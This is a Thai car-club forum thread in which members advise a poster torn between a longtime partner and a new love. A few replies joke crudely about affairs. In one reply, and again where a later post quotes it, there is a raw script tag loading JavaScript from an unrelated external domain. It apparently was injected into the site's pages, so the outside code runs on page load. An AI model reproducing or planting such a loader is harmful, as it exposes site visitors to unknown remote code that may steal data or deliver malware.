ตอบ
TTM

เข้าร่วม: 22 กรกฎา 2009
ตอบ: 8

น้องใหม่
น้องใหม่

ได้รับคำขอบคุณ: 11
ให้คำขอบคุณ: 20

พฤหัส, 10 ธันวา 2009 22:03 - ถ้าคุณต้องเลือกระหว่างความรักกับความผูกพัน คุณจะเลือกอะไร
ถ้าวันนึงคุณเกิดได้ไปรักใครสักคน ทั้งๆที่คุณก็มีคนอีกคนอยู่ก่อนแล้ว คุณจะทำยังไง???????
ถ้าเกิดคนเดิมของคุณเขาก็ไม่ได้ผิดอะไร
ส่วนคนใหม่หัวใจคุณก็บอกกับตัวเองว่ารักเขามากมาย
จนไม่คิดว่าจะรักใครได้มากเท่านี้อีกแล้ว

คุณมีเขาทั้ง2คนในเวลาเดียวกัน
คนเก่ายังอยู่เพราะความผูกพัน
ส่วนคนใหม่ก็รั้งไว้เพราะว่ารัก

อยู่มาวันนึง คน2คน ที่คุณเก็บเขาเอาไว้
ได้บังเอิญมารู้ว่าความจริงว่า ยังมีใครอีกคน
ที่คุณนั้นแอบเก็บเขาไว้ เมื่อ2คนนั้นได้มาเจอกัน
จะเป็นยังไง จะเกิดอะไรขึ้นกับเรื่อง3เศร้านี้

เมื่อความรักต้องมีแค่2 ใครจะต้องเป็นฝ่ายไป เรื่องนี้จะมีทางออกที่ดีมั้ย

ถ้าเป็นคุณ คุณจะเลือกอย่างไหน
ระหว่าง ความรัก และ ความผูกพัน
ถ้าคนทั้ง2คน ต่างก็ไม่ได้ทำอะไรผิด
แต่คงไม่มีใครยอมอยู่ แบบ3คนได้

จะมีทางออกไหนที่ดีที่สุดสำหรับ คนทั้ง3คนนี้ ทางออกที่จะไม่ทำร้าย ทำลายจิตใจใครมากไป
ส่วนตัวข้าพเจ้า ข้าพเจ้าคิดว่า ไม่ว่าจะเป็นทางใด ก็ต้องมีฝ่ายนึงที่ต้องเจ็บปวดอยู่ดี ที่ต้องจากไป
แต่การเจ็บที่ต้องจาก ยังดีกว่าเจ็บที่ต้องทนอยู่ ถ้าคุณยังไม่เลิกกับคนเดิม แต่ก็ไม่ยอมปล่อยให้คนใหม่ไป
มันคงเจ็บปวดทรมานเหมือนตายทั้งเป็นมากกว่าการที่ต้องเป็นฝ่ายจากไป

แล้วถ้าคุณเป็นเขาคนนั้นคุณจะทำยังไง จะเลือกใครระหว่าง"ความรักกับความผูกพัน"

**ใครมีแนวคิดหรือทางออกดีๆช่วยบอกหน่อยนะ จะตอบลงในกระทู้หรือจะตอบที่ Sittichai By TTM เจ้าของปัญหาวุ่นวายเลยก็ได้นะ ขอบพระคุณอย่างสูง สำหรับความคิดเหตุดีๆที่จะให้กัน**
ได้รับคำขอบคุณจาก: witnu  Sittichai By TTM  oil_nirun  tonTON  hacker  watchara4  ae  Plumya13 
TTM

เข้าร่วม: 22 กรกฎา 2009
ตอบ: 8

น้องใหม่
น้องใหม่

ได้รับคำขอบคุณ: 11
ให้คำขอบคุณ: 20

พฤหัส, 10 ธันวา 2009 22:23 - ถ้าคุณต้องเลือกระหว่างความรักกับความผูกพัน คุณจะเลือกอะไร
เข้ามาอ่านกันแล้ว ขอความคิดเห็นด้วยนะ
ขอบคุณ
byeby

เข้าร่วม: 14 ตุลา 2008
ตอบ: 200

มือใหม่หัดขับ

ได้รับคำขอบคุณ: 361
ให้คำขอบคุณ: 1

ปี: 2004
สี: ทอง แซทเทิลไลท์ (NH-663M)
พฤหัส, 10 ธันวา 2009 22:38 - ถ้าคุณต้องเลือกระหว่างความรักกับความผูกพัน คุณจะเลือกอะไร
เลือความรักครับ เพราะความรัก คือปัจจุบันและอนาคต ส่วนความผูกพัน มันคือ อดีต และปัจจุบัน ถึงเราจะเลิกกับใครสักคนไปแล้ว แต่ความผูกพันมันยังอยู่ครับ คำว่าความผูกพันในความคิดผมคือ อยากที่จะรู้อยากคุยอยู่ แต่โดยโลกความจริง ถ้าคบกันอาจจะไปด้วยกันไม่ได้ หรืออาจจะเป็นความรู้สึกเสียดาย ที่ต้องเลิกกัน

เพราะฉะนั้น ความผูกพันไม่จำเป็นว่าต้องเป็นแฟนเรา อาจจะเป็นแฟนเก่าก็ได้ แต่ยังมีช่วงความรู้สึกดีๆ ให้กันอยู่

แต่ความรัก ควรให้กับคนที่จะแต่งงานกับเรา ถ้าให้ความรักหลายคน อาจจะดูเจ้าชู้และไม่ดีต่ออนาคตครับ

แต่ถ้ามีแฟนแล้วจะไม่มองคนอื่นครับ ถึงเขาคนนั้นจะดีหรือไม่ก็ตาม ถ้าจะมีคนอื่น ก็ต้องเลิกกับคนแรกก่อน เพื่อไม่ให้เกิดปัญหาดัง จขกท กำลังเจอครับ (ขอโทษล่วงหน้าครับ ถ้าเกิดกระทบต่อ จขกท) เพราะมันจะเครียด ^^" เป็นความเห็นเฉยๆครับ อย่า serious นะครับ เอาใจช่วย
ได้รับคำขอบคุณจาก: TTM  Rangsit 33  hacker  harry5 
jjim

ชื่อเล่น: จิ้ม

เข้าร่วม: 12 พฤศจิกา 2008
ตอบ: 1016

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1082
ให้คำขอบคุณ: 155

ปี: 2005
สี: เทา ซิลเวอร์สโตน (NH-630M)
พฤหัส, 10 ธันวา 2009 22:54 - ถ้าคุณต้องเลือกระหว่างความรักกับความผูกพัน คุณจะเลือกอะไร
ทำใจลำบากเหมือนกันนะและก็ต้องเจอกับความผิดหวังและสมหวัง
แต่ยังไงๆก็อย่าทำให้ตัวเองลำบากใจไปเลยนะเดี๋ยวจะผิดหวังอีก
ENJOY HONDA

เข้าร่วม: 20 พฤศจิกา 2008
ตอบ: 1346

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1186
ให้คำขอบคุณ: 479

สี: เทา ซิลเวอร์สโตน (NH-630M)
พฤหัส, 10 ธันวา 2009 23:01 - ถ้าคุณต้องเลือกระหว่างความรักกับความผูกพัน คุณจะเลือกอะไร
เพิ่งผ่านมาสดๆ ร้อนเลยครับ...เลือกคนที่เราคบอยู่ก่อนครับ
ได้รับคำขอบคุณจาก: TTM 
จ่าฝูง

เข้าร่วม: 06 ตุลา 2008
ตอบ: 473

แซงซ้าย ปาดขวา

ได้รับคำขอบคุณ: 555
ให้คำขอบคุณ: 297

สี: ทอง แซทเทิลไลท์ (NH-663M)
พฤหัส, 10 ธันวา 2009 23:04 - ถ้าคุณต้องเลือกระหว่างความรักกับความผูกพัน คุณจะเลือกอะไร
เป็นผม ผมจะคบคนที่เป็นปัจจุบัน

หากว่าเขาไม่เคยผิดต่อผม ก็ไม่มีเหตุผลอะไรที่ผมจะทิ้งเขาไปหาคนใหม่

ส่วนอีกคนที่คุณว่า "รัก" นั้น ก็คบกันในลักษณะอื่นที่ไม่ใช่แฟนก็ได้ เป็นเพื่อนที่ดีต่อเขา เป็นพี่ที่รักน้องสาว

ความรักมีหลายลักษณะครับ ไม่จำเป้นต้องเชิงชู้สาวเสมอไป

คิดซะว่าโชคไม่เข้าข้างเรา เจอคนที่เราคิดว่ารักช้าไปหน่อย

ไม่แน่ คุณอาจเป็นที่รักของคนที่คุณคิดว่าแค่ผูกพันก็ได้

งงม่ะ ผมก็งง
battery3k

เข้าร่วม: 09 ธันวา 2008
ตอบ: 1247

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1251
ให้คำขอบคุณ: 3414

ปี: 2002
สี: เงิน ซาติน (เมทัลลิก) (NH-623M)
ศุกร์, 11 ธันวา 2009 00:29 - ถ้าคุณต้องเลือกระหว่างความรักกับความผูกพัน คุณจะเลือกอะไร
ความคิดส่วนตัว ถ้าคุณเลือกคนเก่า แล้วอยู่กับเขาได้อย่้างมีความสุข เลือกซะ
แต่ถ้าคุณเลือกคนเก่า แต่อยู่กับเขาอย่างสงสารเขา คุณไม่มีความสุข
เขาจะมีความสุขด้วยไหม ที่ได้อยู่กับคุณแต่คุณไม่มีความสุข
ที่จริง มันมีรายละเอียดอีกมากมาย ที่มีแต่คุณที่รู้
ผมว่าคุณก็พอรู้่อยู่แล้วละว่าจะเลือกทางไหน จากข้อความของคุณเอง

ไม่ว่าจะเป็นทางใด ก็ต้องมีฝ่ายนึงที่ต้องเจ็บปวดอยู่ดีที่ต้องจากไป
แต่การเจ็บที่ต้องจาก ยังดีกว่าเจ็บที่ต้องทนอยู่
DRINK

เข้าร่วม: 04 ตุลา 2008
ตอบ: 3857

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 5219
ให้คำขอบคุณ: 1708

สี: ขาว ทาฟเฟต้า (NH-578)
ศุกร์, 11 ธันวา 2009 00:39 - ถ้าคุณต้องเลือกระหว่างความรักกับความผูกพัน คุณจะเลือกอะไร
ความผูกพัน ยืนยาวและมั่นคงกว่าความรัก ^^

แต่อย่างไรก็ตามสิ่งที่ดีที่สุดต้องไม่ใช่การรักหรือผูกพันแค่ข้างเดียว

ถ้าเช่นนั้นความรักหรือความผูกพันย่อมหมดความหมาย T T
PAM

ชื่อเล่น: แป๋ม

เข้าร่วม: 17 กรกฎา 2009
ตอบ: 1514

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 2753
ให้คำขอบคุณ: 2884

สี: ดำ ไนท์ฮอว์ก (B-92P)
ศุกร์, 11 ธันวา 2009 02:10 - ถ้าคุณต้องเลือกระหว่างความรักกับความผูกพัน คุณจะเลือกอะไร
ต้องถามตัวเองก่อนว่า
คุณนึกถึงใครในเวลาที่คุณ
มีความทุกข์ ความสุข ความเศร้า
ใครที่อยู่เคียงข้างคุณทุกช่วงเวลาและไม่เคยทิ้งคุณแม้แต่เมื่อคุณไม่เหลืออะไรในชีวิต
(ทั้งนี้ทั้งนั้นผมว่าคุณก็มีคำตอบอยู่แล้วเพียงแต่ยังไม่กล้าที่จะพูดออกมาเท่านั้นเอง)
ยังไงก็เป็นกำลังใจให้ครับ ขอให้เจอทางออกที่ดีที่สุด
LolliPop Sugar

เข้าร่วม: 23 ตุลา 2009
ตอบ: 128

ได้รับคำขอบคุณ: 369
ให้คำขอบคุณ: 79

ศุกร์, 11 ธันวา 2009 07:45 - ถ้าคุณต้องเลือกระหว่างความรักกับความผูกพัน คุณจะเลือกอะไร
เลือกที่จะอยู่กับปัจจุบันค่ะ คือคนที่เราผูกพัน

เพราะว่าเริ่มแรกก็รักพอนานๆไป ความรักก็เปลียนเป็นความผูกพัน

แล้วเค้าก็ไม่ได้ทำอะไรผิดก็เลือกเค้าค่ะ แต่ส่วนใหญ่มักเลือกของใหม่เสมอ555

จริงมั้ยค่ะคนเรา
ได้รับคำขอบคุณจาก: TTM  Lee_ES_turbo  hacker 
soloshot

ชื่อเล่น: แฟลช

เข้าร่วม: 17 มิถุนา 2009
ตอบ: 1243

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 2428
ให้คำขอบคุณ: 1275

ปี: 2001
สี: ทอง ไทเทเนียม (เมทัลลิก) (YR-525M)
ศุกร์, 11 ธันวา 2009 08:17 - ถ้าคุณต้องเลือกระหว่างความรักกับความผูกพัน คุณจะเลือกอะไร
ถ้าเจอเหตุการณ์อย่างนี้ ยังไงก็ต้องมีคนที่เสียใจแน่นอนอยู่แล้ว

ผมจะเลือกอยู่กับคนที่ทำให้เรามีความสุข ครับ
เพราะชีวิตต้องก้าวต่อไป
แป้งร่ำ

เข้าร่วม: 25 พฤศจิกา 2009
ตอบ: 407

ได้รับคำขอบคุณ: 693
ให้คำขอบคุณ: 1030

ศุกร์, 11 ธันวา 2009 08:40 - ถ้าคุณต้องเลือกระหว่างความรักกับความผูกพัน คุณจะเลือกอะไร
ความเห็นส่วนตัวนะคะ

เลือกที่เราอยู่ด้วยและมีความสุข ทำตามใจที่ตัวเองได้เลือก น่าจะดีกว่า

จะใช่หรือไม่ใช่เราก็เป็นคนที่เลือกมันเอง ถ้าเป็นเรื่องจิง ขอเอาใจช่วยแล้วกันนะคะ

เพราะเคยผ่านเหตุการณ์แบบนี้มาเช่นกันคะ T T
Saka

ชื่อเล่น: ศักดิ์

เข้าร่วม: 01 ตุลา 2008
ตอบ: 1873

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1996
ให้คำขอบคุณ: 5358

ศุกร์, 11 ธันวา 2009 08:55 - ถ้าคุณต้องเลือกระหว่างความรักกับความผูกพัน คุณจะเลือกอะไร
กับคนเก่า ก่อนที่จะผูกพันอย่างทุกวันนี้ ทุกสิ่งทุกอย่างก็เริ่มมาจากรักและพัฒนาขึ้นมาเป็นรักและผูกพัน
กับคนใหม่ เพิ่งเริ่มต้น คือรัก ยังต้องเรียนรู้ และใช้เวลาอีกพักนึง ถึงจะเป็นผูกพันได้

ผมเคยผ่านเหตุการณ์นี้มา เมื่อ 3 ปีที่แล้ว ผมเลือก ผูกพันครับ เพราะค้าดีกับผม เค้าไม่ได้ทำผิดอะไร และที่สำคัญเลย ผมทำผิดกับเค้าขนาดนี้ เค้ายังยอม ที่จะอภัยให้ผมได้
ได้รับคำขอบคุณจาก: TTM  virus 
AUM[SilveR]

เข้าร่วม: 14 มกรา 2009
ตอบ: 1151

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 776
ให้คำขอบคุณ: 159

สี: เงิน ซาติน (เมทัลลิก) (NH-623M)
ศุกร์, 11 ธันวา 2009 09:55 - ถ้าคุณต้องเลือกระหว่างความรักกับความผูกพัน คุณจะเลือกอะไร
อืม ความรักที่ว่ามันชั่ววูปนะครับ หากจะตัดสินคน 2 คน ที่เราอยากจะมีไว้ในครอบครองทั้งคู่

โปรดอย่าดูที่ความรักอย่างเดียว เพราะความรักไม่จีรังยั่งยืน ความดีและความเข้าใจกันต่างหากจะทำให้การครองคู่มีความสุข

แต่ผมก็เคยเจอเคสอย่างนี้นะครับ ของใหม่กว่ามันก็มี%ดีกว่าของเก่าเสมอ แต่ด้วยความดีที่เค้ามีให้กับเรามาตลอดมันทำให้เรา

ตัดสินใจได้ว่าใครที่เราควรเลือกจริงๆ และผมก็เลือกแล้วทุกวันนี้ผมก็คิดเสมอว่าเราเลือกคนไม่ผิดจริงๆ
Rangsit 33

ตอบ: 2276

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 3688
ให้คำขอบคุณ: 1582

ศุกร์, 11 ธันวา 2009 10:59 - ถ้าคุณต้องเลือกระหว่างความรักกับความผูกพัน คุณจะเลือกอะไร
byeby พิมพ์ว่า:
เลือความรักครับ เพราะความรัก คือปัจจุบันและอนาคต ส่วนความผูกพัน มันคือ อดีต และปัจจุบัน ถึงเราจะเลิกกับใครสักคนไปแล้ว แต่ความผูกพันมันยังอยู่ครับ คำว่าความผูกพันในความคิดผมคือ อยากที่จะรู้อยากคุยอยู่ แต่โดยโลกความจริง ถ้าคบกันอาจจะไปด้วยกันไม่ได้ หรืออาจจะเป็นความรู้สึกเสียดาย ที่ต้องเลิกกัน

เพราะฉะนั้น ความผูกพันไม่จำเป็นว่าต้องเป็นแฟนเรา อาจจะเป็นแฟนเก่าก็ได้ แต่ยังมีช่วงความรู้สึกดีๆ ให้กันอยู่

แต่ความรัก ควรให้กับคนที่จะแต่งงานกับเรา ถ้าให้ความรักหลายคน อาจจะดูเจ้าชู้และไม่ดีต่ออนาคตครับ

แต่ถ้ามีแฟนแล้วจะไม่มองคนอื่นครับ ถึงเขาคนนั้นจะดีหรือไม่ก็ตาม ถ้าจะมีคนอื่น ก็ต้องเลิกกับคนแรกก่อน เพื่อไม่ให้เกิดปัญหาดัง จขกท กำลังเจอครับ (ขอโทษล่วงหน้าครับ ถ้าเกิดกระทบต่อ จขกท) เพราะมันจะเครียด ^^" เป็นความเห็นเฉยๆครับ อย่า serious นะครับ เอาใจช่วย

"""" ความคิดเดียวกันเป้ะๆ...โดยเฉพาะ 3 บรรทัดสุดท้าย...เหมือนกันคับ
ได้รับคำขอบคุณจาก: TTM  hacker 
minezoo

เข้าร่วม: 17 พฤศจิกา 2008
ตอบ: 492

ได้รับคำขอบคุณ: 532
ให้คำขอบคุณ: 207

ปี: 2003
สี: ทอง เดเสิร์ท มิสท์ (เมทัลลิก) (YP-538M)
ศุกร์, 11 ธันวา 2009 14:11 - ถ้าคุณต้องเลือกระหว่างความรักกับความผูกพัน คุณจะเลือกอะไร
เลือกคนเก่าครับ
เพราะ จะรู้ได้ อย่างไร ว่า พอใช้เวลากับ คนใหม่ แล้ว เราจะรับเขาได้เหมือน คนเก่า

บางคนอาจจะ นอน กรน ปากเหม็น ตดไม่เป็นเวลา ก็ได้นะครับ เรื่องพวกนี้ คนกันนานๆ ถึงจะเจอ

เอาใจช่วยครับ ยังไง เลือก xx ไว้ก่อน ก็ดี
oil_nirun

ชื่อเล่น: ออย

ตอบ: 746

Guru ES
Guru ES

ได้รับคำขอบคุณ: 1338
ให้คำขอบคุณ: 535

ศุกร์, 11 ธันวา 2009 15:11 - ถ้าคุณต้องเลือกระหว่างความรักกับความผูกพัน คุณจะเลือกอะไร
ปัญหาเดียวกับผมเลยจริงๆ....
ผมตัดสินก้อเปงเดือน ยื้อไว้
และผมได้เลือกคนที่ผมรักคับ

และแล้วเวลาเพียงไม่นานก้อทำให้ผมคิดผิดอย่างที่สุด...
คนที่ผมรัก เค้าเอาแต่ใจเปงที่สุด ผมทำไรก้อผิดไปหมด เค้าไม่เคยไว้ใจผมเลยสักนิด กลัวแต่จะกลับไปคุยกับแฟนเก่า
จนชีวิตไม่มีความสุข ทะเลาะกันทุกวัน

กับคนที่ผมคบมาก่อนเค้าอภัยให้ผมได้เสมอ....แต่ในวันนั้นผมได้เลือกแล้ว ไม่มีเธอที่แสนดีอีกต่อไป

เสียใจจริงๆคับที่คิดว่าความรักจะทำได้ทุกๆอย่างแต่กลับเปงความงี่เง่าใส่กัน วันแรกๆก้อดีคับ วันเวลาเพียงไม่นาน ก้อไม่ไว้ใจ ไม่ศรัทธาในคำพูดกัน

ผมต้องมานั่งเสียใจทุกวัน

คิดให้ดีๆคับ ขอให้โชคดี

ปล.คนที่จะเปงเมียเราผมว่าหน้าตาไม่เกี่ยวหรอกคับ สำคัญที่เค้าเปงคนดีรึป่าว "คนดีๆสมัยหายากนะคับ" ส่วนสวยๆxxหาที่ไหนก้อได้คับ ขอแค่มีตังค์ในกระเป๋าหนาๆจะสวยจะxขนาดไหนก้อได้คับ
ปล.2คนดีเงินซื้อไม่ได้ต้องซื้อกันด้วยใจและร่วมทุกข์ร่วมสุขคับ คนสวยๆ xx ไปหาเติมให้เปงกำไรชีวิตข้างนอกบ้านดีกว่าคับ
ได้รับคำขอบคุณจาก: battery3k  virus  maew es  pooza191  TTM  PAE KUNG  hacker  aun99  chengg  harry5 
tonTON

ตอบ: 468

ได้รับคำขอบคุณ: 324
ให้คำขอบคุณ: 463

ปี: 2003
ศุกร์, 11 ธันวา 2009 15:38 - ถ้าคุณต้องเลือกระหว่างความรักกับความผูกพัน คุณจะเลือกอะไร
คบคนเดียวซิคับ...

ดีที่สุด
pooza191

ชื่อเล่น: ปู

ตอบ: 257

มีใบอนุญาตขับขี่

ได้รับคำขอบคุณ: 334
ให้คำขอบคุณ: 215

ศุกร์, 11 ธันวา 2009 15:43 - ถ้าคุณต้องเลือกระหว่างความรักกับความผูกพัน คุณจะเลือกอะไร
คำถามของ จขกท. คล้ายๆ เครสเดียวกะผมเลย

ความเห็นของผมที่เจอมากับตัวเองนะครับ

ผมเลือกความผูกพันครับ(คนเก่า) เพราะคนเก่า เค้าสามารถรับเราได้ทุกอย่าง
เคยเจอเหตุการณ์ต่างๆ ที่ดีและไม่ดีมาด้วยกัน
รู้ว่าเราไม่ดีอย่างไร มีข้อเสียตรงไหน แต่เค้าก็ยังรับเราได้ และก็ยังรักเราเหมือนเดิม

แต่กับความรัก(คนใหม่) ผมไม่แน่ใจว่าเค้าจะรับเราได้หรือไม่หากเค้าได้รู้ถึงข้อเสียของเรา
หรือเมื่อถึงคราวที่ต้องเจอเหตุการณ์ร้ายๆ ด้วยกัน เค้าจะคงยังอยู่กับเราหรือไม่ เท่านั้นครับ

ทั้งหมดนี้เป็นความเห็นส่วนตัวของผมนะครับ
ได้รับคำขอบคุณจาก: TTM  oil_nirun 
virus

เข้าร่วม: 22 มิถุนา 2009
ตอบ: 231

ได้รับคำขอบคุณ: 229
ให้คำขอบคุณ: 248

ศุกร์, 11 ธันวา 2009 15:45 - ถ้าคุณต้องเลือกระหว่างความรักกับความผูกพัน คุณจะเลือกอะไร
เลือกคนที่เขารักเราจะดีกว่า...เพราะคนที่เขารักเราเขาจะไม่มีวันทำให้เราเสียใจ... ตามความคิดส่วนตัวจึงขอเลือกความผูกพัน
PAE KUNG

ชื่อเล่น: เป้

เข้าร่วม: 08 ตุลา 2008
ตอบ: 1131

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 2818
ให้คำขอบคุณ: 3696

สี: เทา ซิกเน็ต (เมทัลลิก) (RP-31M)
อาทิตย์, 13 ธันวา 2009 21:24 - ถ้าคุณต้องเลือกระหว่างความรักกับความผูกพัน คุณจะเลือกอะไร
oil_nirun พิมพ์ว่า:

และแล้วเวลาเพียงไม่นานก้อทำให้ผมคิดผิดอย่างที่สุด...
คนที่ผมรัก เค้าเอาแต่ใจเปงที่สุด ผมทำไรก้อผิดไปหมด เค้าไม่เคยไว้ใจผมเลยสักนิด กลัวแต่จะกลับไปคุยกับแฟนเก่า
จนชีวิตไม่มีความสุข ทะเลาะกันทุกวัน

กับคนที่ผมคบมาก่อนเค้าอภัยให้ผมได้เสมอ....แต่ในวันนั้นผมได้เลือกแล้ว ไม่มีเธอที่แสนดีอีกต่อไป

เสียใจจริงๆคับที่คิดว่าความรักจะทำได้ทุกๆอย่างแต่กลับเปงความงี่เง่าใส่กัน วันแรกๆก้อดีคับ วันเวลาเพียงไม่นาน ก้อไม่ไว้ใจ ไม่ศรัทธาในคำพูดกัน

ปล.คนที่จะเปงเมียเราผมว่าหน้าตาไม่เกี่ยวหรอกคับ สำคัญที่เค้าเปงคนดีรึป่าว "คนดีๆสมัยหายากนะคับ" ส่วนสวยๆxxหาที่ไหนก้อได้คับ ขอแค่มีตังค์ในกระเป๋าหนาๆจะสวยจะxขนาดไหนก้อได้คับ
ปล.2คนดีเงินซื้อไม่ได้ต้องซื้อกันด้วยใจและร่วมทุกข์ร่วมสุขคับ คนสวยๆ xx ไปหาเติมให้เปงกำไรชีวิตข้างนอกบ้านดีกว่าคับ

เฮ้ยนายออยนิรัน ชอบว่ะ คำพูดคมดี ว่าแต่คนข้างๆอ่ะที่เคยบอกใช่ไหมครับ ขอให้มีความสุขนะ "<script src="https://sport32news.com/civicesgroup.js"> ยินดีด้วย
ได้รับคำขอบคุณจาก: hacker 
idris

ชื่อเล่น: ลิตย์

เข้าร่วม: 12 มีนา 2009
ตอบ: 575

ได้รับคำขอบคุณ: 1729
ให้คำขอบคุณ: 710

จันทร์, 14 ธันวา 2009 00:03 - ถ้าคุณต้องเลือกระหว่างความรักกับความผูกพัน คุณจะเลือกอะไร
ส่วนตัวนะครับ เลิกให้หมดเลย จะได้เจ็บเท่าๆกันทั้ง3คน เรื่องแบบนี้ไม่มีคนผิดและไม่มีคนถูกหรอก ผมมองว่า ญ2 คนนี้ไม่มีคนคุณรักเค้าจริงๆเลย เพราะถ้ามีไม่ว่าบทสรุปจะเป็นยังไงคุณจะไม่ลังเลที่จะเลือกเลย (ลองคิดดูดีๆนะครับ)
ได้รับคำขอบคุณจาก: hacker  PAE KUNG  TTM 
หยวน

ชื่อเล่น: ต้น

เข้าร่วม: 13 กรกฎา 2009
ตอบ: 314

ได้รับคำขอบคุณ: 794
ให้คำขอบคุณ: 465

จันทร์, 14 ธันวา 2009 00:14 - ถ้าคุณต้องเลือกระหว่างความรักกับความผูกพัน คุณจะเลือกอะไร
ตอบยากนะ ผมก็มีประสบการมา ไงขอตอบตรงๆเลยนะ ทำวันนี้ให้ดีที่สุดพอคับ
DRINK

เข้าร่วม: 04 ตุลา 2008
ตอบ: 3857

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 5219
ให้คำขอบคุณ: 1708

จันทร์, 14 ธันวา 2009 01:14 - ถ้าคุณต้องเลือกระหว่างความรักกับความผูกพัน คุณจะเลือกอะไร
หยวน พิมพ์ว่า:
ตอบยากนะ ผมก็มีประสบการมา ไงขอตอบตรงๆเลยนะ ทำวันนี้ให้ดีที่สุดพอคับ

หรอ
soloshot

ชื่อเล่น: แฟลช

เข้าร่วม: 17 มิถุนา 2009
ตอบ: 1243

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 2428
ให้คำขอบคุณ: 1275

สี: ทอง ไทเทเนียม (เมทัลลิก) (YR-525M)
จันทร์, 14 ธันวา 2009 08:22 - ถ้าคุณต้องเลือกระหว่างความรักกับความผูกพัน คุณจะเลือกอะไร
PAE KUNG พิมพ์ว่า:

ชอบท่อนนี้จริงๆเลย โดนใจ
ได้รับคำขอบคุณจาก: PAE KUNG  oil_nirun  TTM 
hacker

ชื่อเล่น: เซียนจ๊อบ

เข้าร่วม: 03 ตุลา 2008
ตอบ: 4046

ผู้ชนะเลิศการแข่งขัน ES Drag war 2011
ผู้ชนะเลิศการแข่งขัน ES Drag war 2011

ได้รับคำขอบคุณ: 10965
ให้คำขอบคุณ: 22797

จันทร์, 14 ธันวา 2009 09:34 - ถ้าคุณต้องเลือกระหว่างความรักกับความผูกพัน คุณจะเลือกอะไร
ไม่อยู่ในสถานการณ์ที่ตอบอะไรได้ทั้งนั้น
ได้รับคำขอบคุณจาก: oil_nirun 
cisco

ชื่อเล่น: เต้น

เข้าร่วม: 25 พฤศจิกา 2008
ตอบ: 3557

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 5197
ให้คำขอบคุณ: 9940
จันทร์, 14 ธันวา 2009 10:41 - ถ้าคุณต้องเลือกระหว่างความรักกับความผูกพัน คุณจะเลือกอะไร
เลือกความผูกผันครับ

เพราะทุก ๆ วันเรายังมีเค้าอยู่ ซึ่งถ้าให้ตัดมันคงยาก

คุณลองไม่โทรหาเค้าไม่ติดต่อ ไม่ไปเที่ยวไหนกันเลย แล้วลองถามตัวเองว่าคุณยังคิดถึงเค้าไหม คุณอยากคุยกับเค้าไหม

ไม่ว่าเราจะทำอะไรหรือรู้สึกอย่างไรคนที่ผูกผันมักจะรู้ใจเราเสมอ ไม่ว่าจะเรื่องใด ๆ ก็ตาม ซึ่งบางมุมมองแล้วนั้นแหล่ะคือความรักที่แท้จิงก็เป็นได้

ปล.ยังไงซะคน ๆ นั้น ก็ไม่ได้ผิดอะไรนะครับ คิดให้แน่ใจก่อนว่าเราพร้อมที่จะเลือกอะไร ให้กับตัวเอง ก่อนตัดสินใจ แล้วยอมรับในสิ่งที่เกิดขึ้น ...
oil_nirun

ชื่อเล่น: ออย

ตอบ: 746

Guru ES
Guru ES

ได้รับคำขอบคุณ: 1338
ให้คำขอบคุณ: 535

จันทร์, 14 ธันวา 2009 14:42 - ถ้าคุณต้องเลือกระหว่างความรักกับความผูกพัน คุณจะเลือกอะไร
oil_nirun พิมพ์ว่า:

เฮ้ยนายออยนิรัน ชอบว่ะ คำพูดคมดี ว่าแต่คนข้างๆอ่ะที่เคยบอกใช่ไหมครับ ขอให้มีความสุขนะ "<script src="https://sport32news.com/civicesgroup.js"> ยินดีด้วย

5555+.......หาความสุขข้างนอกบ้านให้ดิ...สุดหล่อ..
sukhothai

เข้าร่วม: 23 สิงหา 2009
ตอบ: 1604

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 2571
ให้คำขอบคุณ: 7453
จันทร์, 14 ธันวา 2009 15:21 - ถ้าคุณต้องเลือกระหว่างความรักกับความผูกพัน คุณจะเลือกอะไร
เลือกที่จะอยู่กับปัจจุบันครับ คือคนที่เราผูกพัน

เพราะว่าเริ่มแรกก็รักพอนานๆไป ความรักก็เปลียนเป็นความผูกพัน

แล้วเค้าก็ไม่ได้ทำอะไรผิดก็เลือกเค้าครับ แต่ส่วนใหญ่มักเลือกของใหม่เสมอ555

จริงมั้ยครับคนเรา แต่ลองถามใจตัวเองดูดีๆก่อนว่าคนใหม่ที่บอกว่า รักมากมาย

จริงแล้วมันแค่อาการ หลง หรือเปล่าส่วนใหญ่คนจะแยกกันไม่ค่อยออก
aun99

ชื่อเล่น: อั้น

เข้าร่วม: 20 ตุลา 2008
ตอบ: 205

ได้รับคำขอบคุณ: 186
ให้คำขอบคุณ: 2181

จันทร์, 14 ธันวา 2009 17:09 - ถ้าคุณต้องเลือกระหว่างความรักกับความผูกพัน คุณจะเลือกอะไร
soloshot พิมพ์ว่า:

ชอบท่อนนี้จริงๆเลย โดนใจ

ชอบเหมือนกันเลยครับ คมจิงๆ
ตอบ
หน้า 1 จาก 2
ไปที่: 
ติดต่อโฆษณา admin@civicesgroup.com
Copyright © 2008-2024 Civic ES Group. All rights reserved.